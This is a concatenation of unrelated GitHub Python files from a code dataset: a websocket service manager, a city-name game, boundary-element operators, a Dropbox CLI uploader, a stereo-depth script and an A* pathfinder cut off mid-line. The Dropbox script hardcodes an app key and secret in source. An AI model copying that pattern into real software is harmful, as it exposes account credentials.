existing_service_pool and not websocket is existing_service_pool.owner_websocket:\n agent_id = websocket.request_headers['agent_id']\n response: IParcel = {\n 'routing': websocket.request_headers['agent'],\n 'action': 'handle_security_alert',\n 'data': { 'alert': 'ServiceCollision', 'message': f\"Agent with ID {agent_id} attempted to overwrite existing service {identifier}\" }\n }\n await existing_service_pool.owner_websocket.send(json.dumps(response))\n return\n # No service_pool found? Let's make one\n target = parcel['data']['target']\n task = self.tasks[target]\n\n args = parcel['data']['args']\n kwargs = parcel['data']['kwargs']\n\n owner_id = websocket.request_headers['agent_id']\n params = { 'args': args, 'kwargs': kwargs }\n\n options = parcel['data']['options']\n\n new_service_pool = ServicePool(identifier, owner_id, websocket, task, params, **options)\n self.identifier_to_service_pools[identifier] = new_service_pool\n\n agent = websocket.request_headers['agent']\n if agent == 'client':\n agent_id = websocket.request_headers['agent_id']\n if agent_id in self.client_pool_identifiers:\n self.client_pool_identifiers[agent_id].add(identifier)\n else:\n self.client_pool_identifiers[agent_id] = set([identifier])\n\n new_service_pool.run()\n\n async def join_service_pool(self, parcel: IParcel, websocket):\n \"\"\"\n A client may join a service pool through this action.\n \"\"\"\n identifier = parcel['data']['identifier']\n service_pool = await self.get_service_pool(identifier, websocket)\n if service_pool:\n await service_pool.add_client_connection(websocket)\n\n async def hook_into_pool(self, parcel: IParcel, websocket):\n \"\"\"\n Every service should send this action once.\n\n Hook logic is implemented by default in the ServmanAgent\n helper.\n \"\"\"\n identifier = parcel['data']['identifier']\n service_pool: ServicePool or None = await self.get_service_pool(identifier, websocket)\n if service_pool: \n service_pool.service_connection = websocket\n\n async def close_service(self, parcel: IParcel, websocket):\n identifier = parcel['data']['service_identifer']\n service_pool: ServicePool = await self.get_service_pool(identifier, websocket)\n if service_pool:\n await service_pool.close(identifier)\n \n async def kill(self, parcel: IParcel, websocket):\n secret = parcel['data']['secret']\n if secret == self.secret:\n self.killed = True\n print(\"Killing Servman. Good bye!\")\n self.logger.info(f\"Received {self.n_messages} messages, servicing {len(self.id_to_websocket.values())} websockets and {len(self.identifier_to_service_pools.keys())} active agents.\")\n try:\n exit()\n except BaseException:\n exit()\n else:\n self.logger.info(f\"Connection with ID {websocket.request_headers['connection_id']} attempted to kill Servman but failed to guess its secret.\")\n\n def register_task(self, key: str, task: Callable):\n if self.tasks.get(key, None):\n pass\n self.tasks[key] = task\n\n ### Prefabs / Get\n async def get_service_pool(self, identifier, websocket):\n service_pool: ServicePool = self.identifier_to_service_pools.get(identifier, None)\n if not service_pool:\n response: IParcel = { \n 'routing': websocket.request_headers['agent'],\n 'action': 'handle_servman_error',\n 'data': { 'exception': 'ServicePoolNotFound', 'message': f\"Service pool with identifier {identifier} not found\" }\n }\n await websocket.send(json.dumps(response))\n return None\n else:\n return service_pool\n \n ### Prefabs / Other\n async def build_pipeline(self, websocket):\n \"\"\"\n Clients and services communicate through a Pipeline. A client\n may establish any number of Pipelines. This may change\n in the future.\n \"\"\"\n # First identify the service\n identifier = ''\n purpose = ''\n try:\n identifier = websocket.request_headers['identifier']\n purpose = websocket.request_headers['purpose']\n except KeyError:\n self.logger.error(\"KeyError in build_pipeline\")\n return\n\n\n identifier = websocket.request_headers['identifier']\n service_pool = await self.get_service_pool(identifier, websocket)\n if not service_pool:\n return\n\n purpose = websocket.request_headers['purpose']\n pipeline: Pipeline = service_pool.pipelines.get(purpose, None)\n if not pipeline:\n pipeline = Pipeline(purpose)\n service_pool.pipelines[purpose] = pipeline\n\n agent = websocket.request_headers['agent']\n if agent == 'client':\n pipeline.client_connection_id = websocket.request_headers['connection_id']\n pipeline.client_connection = websocket\n elif agent == 'service':\n pipeline.service_connection_id = websocket.request_headers['connection_id']\n pipeline.service_connection = websocket\n \n if not pipeline.bridged and pipeline.client_connection and pipeline.service_connection:\n pipeline.connections[pipeline.client_connection] = pipeline.service_connection\n pipeline.connections[pipeline.service_connection] = pipeline.client_connection\n\n client_parcel = {\n 'routing': 'client',\n 'action': 'catch_proxy_credentials',\n 'data': {'purpose': purpose, 'connection_id': pipeline.service_connection_id }\n }\n service_parcel = {\n 'routing': 'service',\n 'action': 'catch_proxy_credentials',\n 'data': {'purpose': purpose, 'connection_id': pipeline.client_connection_id }\n }\n await pipeline.client_connection.send(json.dumps(client_parcel))\n await pipeline.service_connection.send(json.dumps(service_parcel))\n pipeline.bridged = True\n elif not pipeline.bridged and pipeline.client_connection and not pipeline.service_connection:\n bridge_service_parcel = {\n 'routing': 'service',\n 'action': 'bridge_pipeline',\n 'data': { 'purpose': purpose, 'identifier': identifier }\n }\n await service_pool.service_connection.send(json.dumps(bridge_service_parcel))\n else:\n self.logger.error(\"@@@@@@@@@@@@@@@@@@@@@@@@ >< This should never happen. Synchronization error? Bad request?\")\n\n ### Tasks\n async def run_server(self):\n print(\"Starting Servman.\")\n\n extra_headers = [\n ('agent', 'servman'),\n ('agent_id', self._agent_id)\n ]\n\n async def handle_websocket(websocket, request_path):\n await self.register_websocket(websocket)\n \n try:\n async for message in websocket:\n self.n_messages += 1\n parcel: IParcel = json.loads(message)\n await self.routes[parcel['routing']](parcel, websocket)\n except JSONDecodeError:\n self.logger.exception(f\"JSON Error in ServiceManager.handle_websocket: Message not encoded in JSON.\\n\\n\")\n except ConnectionClosedError:\n self.logger.exception(f\"Websocket {websocket} closed unexpectedly.\")\n except Exception as e:\n self.logger.exception(f\"\\n\\nOther Error in ServiceManager.handle_websocket: {e}\\n\\n\")\n traceback.print_exc()\n new_parcel: IParcel = {\n 'routing': parcel['routing'],\n 'action': 'handle_servman_error',\n 'data': { 'parcel': parcel, 'exception': e.__str__(), 'message': 'exception occurred while handling websocket' }\n }\n await websocket.send(json.dumps(new_parcel))\n\n await self.unregister_websocket(websocket)\n\n self.server = await websockets.serve(\n handle_websocket,\n host=self.host,\n port=self.port,\n max_queue=2048,\n max_size=None,\n extra_headers=extra_headers,\n origins=[None]\n )\n\n while not self.killed:\n await asyncio.Future()\n\n\n async def log_metrics(self):\n while not self.killed:\n await asyncio.sleep(3)\n self.logger.info(f\"Received {self.n_messages} messages, servicing {len(self.id_to_websocket.values())} websockets and {len(self.identifier_to_service_pools.keys())} active agents.\")\n\n\n async def do_work(self):\n tasks = [\n self.run_server(),\n self.log_metrics()\n ]\n await asyncio.gather(*tasks)\n\n def run(self):\n multiprocessing.set_start_method(\"spawn\")\n loop = asyncio.get_event_loop()\n loop.run_until_complete(self.do_work())","repo_name":"dggfi/Servman","sub_path":"src/servman/servman.py","file_name":"servman.py","file_ext":"py","file_size_in_byte":17672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42749590847","text":"from codecs import utf_8_encode\n\nclass CityGame:\n def __init__(self, file_name) :\n self.alfabet_str = 'АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЭЮЯ'\n try:\n with open(file_name, 'r', encoding='utf-8') as file:\n cities_list = file.readlines()\n self.cities_dict = {letter: [city.strip('\\n') for city in cities_list if city.startswith(letter)] \n for letter in self.alfabet_str if len([city.strip('\\n') for city in cities_list if city.startswith(letter)]) > 0}\n except IOError:\n raise IOError(\"Reading file error\")\n\n def getCityByLetter(self, letter):\n if not isinstance(letter, str) or len(letter) > 1:\n return 'Not letter'\n letter = letter.upper()\n if letter not in self.cities_dict:\n return 'No cities starting with this letter'\n for key in self.cities_dict:\n if key == letter:\n if len(self.cities_dict[key]) == 0:\n return 'Ran out of cities starting with this letter'\n answer_dict = {}\n for i in range(len(self.cities_dict[key])):\n city = self.cities_dict[key][i]\n last_letter = city[len(city) - 1].upper()\n if last_letter in self.cities_dict:\n if len(self.cities_dict[last_letter]) not in answer_dict:\n answer_dict[len(self.cities_dict[last_letter])] = i \n answer = self.cities_dict[key][answer_dict[min(answer_dict)]]\n new_cities_list = self.cities_dict[letter]\n del new_cities_list[answer_dict[min(answer_dict)]]\n self.cities_dict[letter] = new_cities_list\n return answer","repo_name":"VasinDA/tasks","sub_path":"task_5/city_game.py","file_name":"city_game.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20415586167","text":"import numpy as _np\nfrom bempp.api.utils.linear_operator import LinearOperator\n\n\ndef _sum(op1, op2):\n\n if op1 is None:\n return op2\n elif op2 is None:\n return op1\n else:\n return op1 + op2\n\ndef _prod(op1, op2):\n\n if op1 is None or op2 is None:\n return None\n else:\n return op1 * op2\n\nclass BlockedOperator(object):\n def __init__(self, m, n):\n\n self._m = m\n self._n = n\n\n self._operators = _np.empty((m, n), dtype=_np.object)\n self._rows = m * [False]\n self._cols = n * [False]\n\n def __getitem__(self, key):\n\n return self._operators[key]\n\n def __setitem__(self, key, operator):\n\n self._operators[key] = operator\n self._rows[key[0]] = True\n self._cols[key[1]] = True\n\n def _fill_complete(self):\n\n return (False not in self._cols) and (False not in self._rows)\n\n def weak_form(self):\n\n if not self._fill_complete():\n raise ValueError(\"Each row and column must have at least one operator\")\n\n discrete_operator = BlockedDiscreteOperator(self._m, self._n)\n\n for i in range(self._m):\n for j in range(self._n):\n if self._operators[i, j] is not None:\n discrete_operator[i, j] = self._operators[i, j].weak_form()\n\n return discrete_operator\n\n def strong_form(self, mode='simple'):\n\n if not self._fill_complete():\n raise ValueError(\"Each row and column must have at least one operator\")\n\n\n if mode=='full':\n discrete_operator = BlockedDiscreteOperator(self._m, self._n)\n\n for i in range(self._m):\n for j in range(self._n):\n if self._operators[i, j] is not None:\n discrete_operator[i, j] = self._operators[i, j].strong_form()\n return discrete_operator \n\n elif mode=='simple':\n from bempp.api import InverseSparseDiscreteBoundaryOperator\n from bempp.api.operators.boundary.sparse import identity\n\n blocked = BlockedDiscreteOperator(self.ndims[0], self.ndims[0])\n\n for i in range(self.ndims[0]):\n op = None\n for j in range(self.ndims[1]):\n if self[i, j] is not None:\n op = self[i, j]\n break\n\n blocked[i, i] = InverseSparseDiscreteBoundaryOperator(\n identity(op.range, op.dual_to_range, \n op.dual_to_range).weak_form())\n return blocked * self.weak_form() \n else:\n raise ValueError(\"Unknown value for 'mode'. Allowed values are 'simple' and 'full'\")\n\n def __add__(self, other):\n\n if self.ndims != other.ndims:\n return ValueError(\"Both blocked operators must have the same dimensions.\")\n\n blocked_operator = BlockedOperator(self.ndims[0], self.ndims[1])\n\n for i in range(self.ndims[0]):\n for j in range(self.ndims[1]):\n if other[i, j] is None:\n blocked_operator[i, j] = self[i, j]\n elif self[i, j] is None:\n blocked_operator[i, j] = other[i, j]\n else:\n blocked_operator[i, j] = self[i, j] + other[i, j]\n return blocked_operator\n\n def __neg__(self):\n return self.__mul__(-1)\n\n def __sub__(self, other):\n return self.__add__(-other)\n\n def __mul__(self, other):\n\n import numpy as np\n if np.isscalar(other):\n\n blocked_operator = BlockedOperator(self.ndims[0], self.ndims[1])\n for i in range(self.ndims[0]):\n for j in range(self.ndims[1]):\n if self[i, j] is not None:\n blocked_operator[i, j] = other * self[i, j]\n return blocked_operator\n elif isinstance(other, BlockedOperator):\n if self.ndims[1] != other.ndims[0]:\n return ValueError(\"Dimensions are not compatible.\")\n blocked_operator = BlockedOperator(self.ndims[0], other.ndims[1])\n for i in range(self.ndims[0]):\n for j in range(other.ndims[1]):\n for k in range(self.ndims[1]):\n blocked_operator[i, j] = _sum(blocked_operator[i, j],\n _prod(self[i, k], other[k, j]))\n return blocked_operator\n else:\n return NotImplementedError\n\n def __rmul__(self, other):\n\n import numpy as np\n if np.isscalar(other):\n return self.__mul__(other)\n else:\n return NotImplementedError\n\n\n def get_ndims(self):\n\n return (self._m, self._n)\n\n ndims = property(get_ndims)\n\n\nclass BlockedDiscreteOperator(LinearOperator):\n def __init__(self, m, n):\n\n self._m = m\n self._n = n\n self._operators = _np.empty((m, n), dtype=_np.object)\n self._rows = _np.zeros(m, dtype=int)\n self._cols = _np.zeros(n, dtype=int)\n\n def __getitem__(self, key):\n\n return self._operators[key]\n\n def __setitem__(self, key, operator):\n\n if self._rows[key[0]] != 0:\n if operator.shape[0] != self._rows[key[0]]:\n raise ValueError(\"Incompatible number of rows\")\n else:\n self._rows[key[0]] = operator.shape[0]\n\n if self._cols[key[1]] != 0:\n if operator.shape[1] != self._cols[key[1]]:\n raise ValueError(\"Incompatible number of columns\")\n else:\n self._cols[key[1]] = operator.shape[1]\n self._operators[key] = operator\n\n def _fill_complete(self):\n\n if (0 in self._rows) or (0 in self._cols):\n return False\n\n return True\n\n def _matvec(self, x):\n\n from bempp.api.utils.data_types import combined_type\n\n if x.ndim == 1:\n x_new = _np.expand_dims(x, 1)\n return self.matvec(x_new).ravel()\n\n if not self._fill_complete():\n raise ValueError(\"Not all rows or columns contain operators.\")\n\n row_dim = 0\n res = _np.zeros((self.shape[0], x.shape[1]), dtype=combined_type(self.dtype, x.dtype))\n\n for i in range(self._m):\n col_dim = 0\n local_res = res[row_dim:row_dim + self._rows[i], :]\n for j in range(self._n):\n local_x = x[col_dim:col_dim + self._cols[j], :]\n if self._operators[i, j] is not None:\n op_is_complex = _np.iscomplexobj(self._operators[i, j].dtype.type(1))\n if _np.iscomplexobj(x) and not op_is_complex:\n local_res[:] += (self._operators[i, j].dot(_np.real(local_x)) +\n 1j * self._operators[i, j].dot(_np.imag(local_x)))\n else:\n local_res[:] += self._operators[i, j].dot(local_x)\n col_dim += self._cols[j]\n row_dim += self._rows[i]\n return res\n\n def _get_shape(self):\n return (_np.sum(self._rows), _np.sum(self._cols))\n\n def _get_dtype(self):\n\n from bempp.api.utils.data_types import combined_type\n\n d = 'float64'\n for obj in self._operators.ravel():\n if obj is not None:\n d = combined_type(d, obj.dtype)\n\n return d\n\n def _get_ndims(self):\n\n return (self._m, self._n)\n\n def _get_row_dimensions(self):\n return self._rows\n\n def _get_column_dimensions(self):\n return self._cols\n\n def _as_matrix(self):\n if not self._fill_complete():\n raise ValueError(\"Not all rows or columns contain operators.\")\n rows = []\n for i in range(self._m):\n row = []\n for j in range(self._n):\n if self[i, j] is None:\n row.append(_np.zeros((self._rows[i], self._cols[j])))\n else:\n row.append(self[i, j].as_matrix())\n rows.append(_np.hstack(row))\n return _np.vstack(rows)\n\n shape = property(_get_shape)\n dtype = property(_get_dtype)\n ndims = property(_get_ndims)\n row_dimensions = property(_get_row_dimensions)\n column_dimensions = property(_get_column_dimensions)\n","repo_name":"micromagnetics/bempp","sub_path":"python/bempp/api/assembly/blocked_operator.py","file_name":"blocked_operator.py","file_ext":"py","file_size_in_byte":8289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30067927552","text":"from typing import List\n\nInput: [2, 3, -2, 4]\nOutput: 6\n\n\nclass Solution:\n def maxProduct(self, nums: List[int]) -> int:\n maximum = big = small = nums[0]\n for n in nums[1:]:\n big, small = max(n, n*big, n*small), min(n, n*big, n*small)\n maximum = max(maximum, big)\n return maximum\n\n\ng = Solution()\nprint(g.maxProduct([-4, -3, -2]))\n\n# Runtime: 40 ms, faster than 97.85 % of Python3 online submissions for Maximum Product Subarray.\n# Memory Usage: 13.1 MB, less than 90.12 % of Python3 online submissions for Maximum Product Subarray.\n","repo_name":"sunling/Algorithmic-Study","sub_path":"week6-DP/M152MaximumProductSubarray.py","file_name":"M152MaximumProductSubarray.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"2071951705","text":"import json\nimport os\n\nimport folium\nimport jieba\nfrom folium.plugins import HeatMap\nfrom pyecharts.charts import Bar\nfrom wordcloud import WordCloud\n\n\ndef draw_heat_map(data, result_path, file_name):\n heat_map_counter = {}\n for i in data:\n longitude = float('%.1f' % float(i.get('longitude')))\n latitude = float('%.1f' % float(i.get('latitude')))\n name = str(latitude) + '-' + str(longitude)\n if name in heat_map_counter:\n heat_map_counter[name][2] = heat_map_counter[name][2] + 1\n else:\n heat_map_counter[name] = [latitude, longitude, 1]\n result = [[j[0], j[1], j[2]] for i, j in heat_map_counter.items()]\n map_ = folium.Map(location=[35, 110], zoom_start=5)\n HeatMap(result).add_to(map_)\n map_.save(os.path.join(result_path, file_name + '.html'))\n\n\ndef draw_year_bar(title, data, result_path):\n counter = {}\n for each in data:\n o_time = each.get('o_time').split(' ')[0].split('-')[0]\n if o_time in counter:\n counter[o_time] += 1\n else:\n counter[o_time] = 1\n counter = dict(sorted(counter.items(), key=lambda item: item[0]))\n\n bar = Bar()\n attrs = [i for i, j in counter.items()]\n values = [j for i, j in counter.items()]\n bar.add_xaxis(attrs)\n bar.add_yaxis('111', values)\n bar.render(os.path.join(result_path, '%s.html' % title))\n\n\n'''统计词频'''\n\n\ndef statistics(texts, stopwords):\n words_dict = {}\n for text in texts:\n temp = jieba.cut(text)\n for t in temp:\n if t in stopwords or t == 'unknown':\n continue\n if t in words_dict.keys():\n words_dict[t] += 1\n else:\n words_dict[t] = 1\n return words_dict\n\n\ndef draw_word_cloud(words, title, result_path):\n wc = WordCloud(font_path='simkai.ttf', background_color='white', max_words=2000, width=1920, height=1080,\n margin=5)\n wc.generate_from_frequencies(words)\n wc.to_file(os.path.join(result_path, title + '.png'))\n\n\ndef main():\n data_source_path = '../../data.json'\n result_path = './result'\n if not os.path.exists(result_path):\n os.mkdir(result_path)\n\n data = json.load(open(data_source_path, 'r', encoding='utf-8'))\n\n # 热力图\n draw_heat_map(data, result_path, 'heatmap')\n\n # 柱状图\n\n draw_year_bar(title='每年地震发生频次统计', data=data, result_path=result_path)\n\n # 词云\n stopwords = open('stopwords.txt', 'r', encoding='utf-8').read().split('\\n')[:-1]\n texts = [each.get('location') for each in data]\n words_dict = statistics(texts, stopwords)\n draw_word_cloud(words_dict, '地震地点名词云', result_path=result_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yanyi5496/commonutil","sub_path":"earthquake/earthquake/analyze/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21232388611","text":"import requests as req\r\nimport json\r\nimport sys\r\nimport os\r\nimport webbrowser\r\nimport logging\r\nimport time\r\n\r\nimport loggercnf\r\nimport launcher\r\n\r\n\r\nlogger = logging.getLogger('mainapp')\r\n\r\n\r\n# Сonstants.\r\nAPP_KEY = 'mlfjqpykeprpqso'\r\nAPP_SECRET = '3q9y9dk1oav1tvj'\r\nAUTH_URL = f'https://www.dropbox.com/oauth2/authorize?' \\\r\n f'client_id={APP_KEY}&response_type=code'\r\n\r\n\r\n# Function for obtaining an access token.\r\ndef authorization():\r\n webbrowser.open_new(AUTH_URL)\r\n print('Click \"Continue\" on the site that opens, '\r\n 'than click \"Allow\" '\r\n 'and copy your access token to the next request.')\r\n auth_code = input('Enter the authorization code: ')\r\n token_url = \"https://api.dropboxapi.com/oauth2/token\"\r\n params = {\r\n \"code\": auth_code,\r\n \"grant_type\": \"authorization_code\",\r\n \"client_id\": APP_KEY,\r\n \"client_secret\": APP_SECRET\r\n }\r\n try:\r\n r = req.post(token_url, data=params)\r\n response_data = json.loads(r.text)\r\n logger.info('Access token received successfully.')\r\n return response_data.get('access_token')\r\n except ValueError:\r\n logger.critical('Error getting access token')\r\n\r\n\r\n# The function that downloads the specified file.\r\ndef uploader(src_path_file, dropbox_folder, access_token):\r\n upload_url = 'https://content.dropboxapi.com/2/files/upload'\r\n try:\r\n with open(f'{src_path_file}', 'rb') as f:\r\n data = f.read()\r\n except:\r\n logger.error(f'Impossible to read next file {src_path_file}')\r\n headers = {\r\n 'Authorization': f'Bearer {access_token}',\r\n 'Dropbox-API-Arg': f'{{\"path\":{dropbox_folder},'\r\n f'\"mode\": \"add\",'\r\n f'\"autorename\": true,'\r\n f'\"mute\": false,'\r\n f'\"strict_conflict\": false}}',\r\n 'Content-Type': 'application/octet-stream'\r\n }\r\n try:\r\n r = req.post(upload_url, headers=headers, data=data)\r\n if r:\r\n print('File sent successfully.')\r\n logger.info('File sent successfully.')\r\n else:\r\n print('Bad request. Check dst_path.')\r\n logger.critical(r)\r\n except:\r\n print('ER')\r\n return\r\n\r\n\r\n# The function that loads the specified file.\r\ndef downloader(src_path, dst_path, access_token):\r\n download_url = 'https://content.dropboxapi.com/2/files/download'\r\n headers = {\r\n 'Authorization': f'Bearer {access_token}',\r\n 'Dropbox-API-Arg': f'{{\"path\":{src_path}}}'\r\n }\r\n r = req.post(download_url, headers=headers)\r\n try:\r\n with open(f'{dst_path}', 'wb') as f:\r\n f.write(r.content)\r\n if r:\r\n print('File received successfully.')\r\n logger.info('File received successfully.')\r\n else:\r\n logger.critical(r.text)\r\n except PermissionError:\r\n logger.error(f'Permission denied: {dst_path}')\r\n return\r\n\r\n\r\n# put/get src_path dst_path\r\nif len(sys.argv) < 3:\r\n print(f'Invalid number of arguments {len(sys.argv)}.'\r\n f'\\nMust be 3: put or get, '\r\n f'source path and destination path.')\r\n logger.error(f'Invalid number of arguments {len(sys.argv)}.')\r\nelse:\r\n # DropBox file size limit for download function.\r\n dp_size_limiter = 150000000\r\n key_list = [\r\n 'util',\r\n 'action',\r\n 'src_path',\r\n 'dst_path'\r\n ]\r\n argv_list = [i for i in sys.argv]\r\n user_args_dict = dict(zip(key_list, argv_list))\r\n if user_args_dict.get('action') == 'get':\r\n logger.info('Started \"downloader\" fun.')\r\n downloader(\r\n f'\"{user_args_dict.get(\"src_path\")}\"',\r\n user_args_dict.get(\"dst_path\"),\r\n authorization()\r\n )\r\n elif user_args_dict.get('action') == 'put':\r\n if os.path.exists(user_args_dict.get('src_path')):\r\n if os.path.getsize(user_args_dict.get('src_path')) <= dp_size_limiter:\r\n logger.info('Started \"uploader\" fun.')\r\n uploader(\r\n user_args_dict.get(\"src_path\"),\r\n f'\"{user_args_dict.get(\"dst_path\")}\"',\r\n authorization()\r\n )\r\n else:\r\n print('Exceeded the file size for the specified function. '\r\n 'The file should be no more than 150Mb')\r\n logger.error(f'File size more than 150Mb: '\r\n f'{os.path.getsize(user_args_dict.get(\"src_path\"))}')\r\n else:\r\n print('The file at the specified path is missing '\r\n 'or the path is incorrect.')\r\n logger.error(f'No file or wrong path: '\r\n f'{user_args_dict.get(\"src_path\")}')\r\n else:\r\n print('File operation not possible. Please, use \"get\" or \"put\".')\r\n logger.error(f'Unknown action \"{user_args_dict.get(\"action\")}\"')\r\n\r\nprint('This window will close in 10 seconds.')\r\ntime.sleep(10)\r\n\r\n","repo_name":"Timofey-Lutsenko/InfoTechTest","sub_path":"mainapp.py","file_name":"mainapp.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8448109652","text":"import os\nfrom prometheus_client import start_http_server\nfrom file_uploader import Uploader\n\n\nif __name__ == '__main__':\n\n METRICS_PORT = int(os.environ.get(\"METRICS_PORT\", \"9001\"))\n start_http_server(METRICS_PORT)\n\n camera_name = os.environ.get(\"CAMERA_NAME\")\n aws_s3_host = os.environ.get(\"AWS_S3_HOST\")\n aws_s3_access_key = os.environ.get(\"AWS_S3_ACCESS_KEY\")\n aws_s3_secret_key = os.environ.get(\"AWS_S3_SECRET_KEY\")\n aws_s3_bucket = os.environ.get(\"AWS_S3_BUCKET\")\n cache_directory = os.environ.get(\"CACHE_DIRECTORY\")\n\n uploader = Uploader(camera_name, aws_s3_host, aws_s3_access_key, aws_s3_secret_key, aws_s3_bucket, cache_directory)\n uploader.run()\n","repo_name":"CiscoDevNet/greatbear","sub_path":"edge-frame-grabber/app/image-uploader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13555117855","text":"# -*- coding:utf-8 -*-\n__author__ = \"leo\"\n\n\ndef black_wrapper(func):\n def run(*args, **kwargs):\n base_page = args[0]\n try:\n return func(*args, **kwargs)\n except Exception as e:\n base_page.driver.implicitly_wait(10)\n for black in base_page.black_list:\n elements = base_page.finds(*black)\n if len(elements) > 0:\n elements[0].click()\n return func(*args, **kwargs)\n raise e\n\n return run\n","repo_name":"Leofighting/hogwarts-16-xiaoyao","sub_path":"app/homework_0107/black_handle.py","file_name":"black_handle.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"38033558170","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json\n\ndef create_output(vertices, colors, filename):\n colors = colors.reshape(-1, 3)\n vertices = np.hstack([vertices.reshape(-1,3), colors])\n\n ply_header = '''ply\n format ascii 1.0\n element vertex %(vert_num)d\n property float x\n property float y\n property float z\n property uchar red\n property uchar green\n property uchar blue\n end_header\n '''\n\n with open(filename, 'w') as f:\n f.write(ply_header % dict(vert_num=len(vertices)))\n np.savetxt(f, vertices, '%f %f %f %d %d %d')\n \nL_FPATH = '/Users/flap/MasterThesis/source/food-volume-stereo/calibrate_images/ip12_image_small/IMG_7161.jpeg'\nR_FPATH = '/Users/flap/MasterThesis/source/food-volume-stereo/calibrate_images/ip12_image_small/IMG_7163.jpeg'\n\nimage_left = cv2.imread(L_FPATH)\nimage_right = cv2.imread(R_FPATH)\n\nimage_left = cv2.cvtColor(image_left, cv2.COLOR_BGR2GRAY)\nimage_right = cv2.cvtColor(image_right, cv2.COLOR_BGR2GRAY)\n\noutput_file = \"out.ply\"\n\nif image_left.shape[0] != image_right.shape[0] or \\\n image_left.shape[1] != image_right.shape[1]:\n raise TypeError(\"Input images must be of the same size\")\n\n# downscale images for faster processing\nimage_left = cv2.pyrDown(image_left) \nimage_right = cv2.pyrDown(image_right)\n\nimage_left = cv2.pyrDown(image_left) \nimage_right = cv2.pyrDown(image_right)\n\nimage_left = cv2.pyrDown(image_left) \nimage_right = cv2.pyrDown(image_right)\n\n# disparity range is tuned for 'aloe' image pair\nwin_size = 1\nmin_disp = 16\nmax_disp = min_disp * 4\nnum_disp = max_disp - min_disp # Needs to be divisible by 16\nstereo = cv2.StereoSGBM(minDisparity = min_disp,\n numDisparities = num_disp,\n SADWindowSize = win_size,\n uniquenessRatio = 10,\n speckleWindowSize = 20,\n speckleRange = 16,\n disp12MaxDiff = 1,\n P1 = 8*3*win_size**2,\n P2 = 32*3*win_size**2,\n fullDP = True\n)\n\n# disparity_map = stereo.compute(image_left, image_right)\ndisparity_map = stereo.compute(image_left, image_right).astype(np.float32) / 16.0\n\n\n\nprint(\"\\nComputing the disparity map ...\")\n\n\n# print \"\\nGenerating the 3D map ...\"\nh, w = image_left.shape[:2]\nfocal_length = 0.8*w \n\n# Perspective transformation matrix\nQ = np.float32([[1, 0, 0, -w/2.0],\n [0,-1, 0, h/2.0], \n [0, 0, 0, -focal_length], \n [0, 0, 1, 0]])\n\npoints_3D = cv2.reprojectImageTo3D(disparity_map, Q)\ncolors = cv2.cvtColor(image_left, cv2.COLOR_BGR2RGB)\nmask_map = disparity_map > disparity_map.min()\noutput_points = points_3D[mask_map]\noutput_colors = colors[mask_map]\n\nprint(\"\\nCreating the output file ...\\n\")\ncreate_output(output_points, output_colors, output_file)","repo_name":"flapperz/food-volume-stereo","sub_path":"stereo.py","file_name":"stereo.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9639298215","text":"import collections\nfrom collections import OrderedDict\n\nrd = {}\nrd[\"s\"] = 1\nrd['liuzhuang'] = 2\nrd['asdf'] = 3\nrd['wwww']= 43\nrd['qwer'] = 12\n\nfor key in rd.keys():\n print(key)\nprint(\"#######################################################\")\n\nod = OrderedDict()\nod[\"s\"] = 1\nod['liuzhuang'] = 2\nod['asdf'] = 3\nod['wwww']= 43\nod['qwer'] = 12\n\nfor kry in od.keys():\n print(kry)\nfor kk, vv in od.items():\n print(str(kk) + \" \" + str(vv))","repo_name":"zhuango/python","sub_path":"pythonLearning/dataStructure/OrderedDict.py","file_name":"OrderedDict.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"30174182642","text":"from queue import PriorityQueue\nimport pandas as pd\nimport cv2\n\nclass A_Star:\n def __init__(self, filename, start, goal):\n # Converting csv to dictionary\n self.filename = filename\n self.df = pd.read_csv(filename)\n self.dict = self.csv2Dict()\n\n self.start = self.arrayCord(start)\n self.goal = self.arrayCord(goal)\n self.g = 0\n self.h = float(\"inf\")\n self.f = self.g + self.h\n self.pathList = [self.start]\n self.pathDict = {self.g : self.start}\n print(\"Initializing Completed!!!\")\n\n def csv2Dict(self):\n print(\"Processing Data...\")\n for i in range(1, len(self.df.x)):\n if abs(self.df.x[i] - self.df.x[i-1]) < 1.5:\n self.df.x[i] = self.df.x[i-1]\n\n if abs(self.df.y[i] - self.df.y[i-1]) < 1.5:\n self.df.y[i] = self.df.y[i-1]\n\n self.df = self.df.drop_duplicates()\n self.df.sort_values(by = 'x')\n # df_new = self.df.groupby(['x']).y.count()[lambda k: k < 5]\n # values = df_new.index.to_list()\n # self.df = self.df[self.df.x.isin(values) == False]\n self.df.to_csv(self.filename, header = True, index = False)\n self.arr = self.df.values.tolist()\n self.arr.sort()\n cordDict = {i[0] : [j[1] for j in self.arr if j[0] == i[0]] for i in self.arr}\n\n return cordDict\n\n def arrayCord(self, cord):\n # Converting given co-ordinates into\n # suitable co-ordinates belonging to array\n if cord in self.arr:\n return cord\n\n else:\n xC, yC = cord\n\n # For x\n keys = list(self.dict.keys())\n for i in range(len(keys)):\n if xC <= keys[i]:\n if abs(keys[i] - xC) >= abs(keys[i-1] - 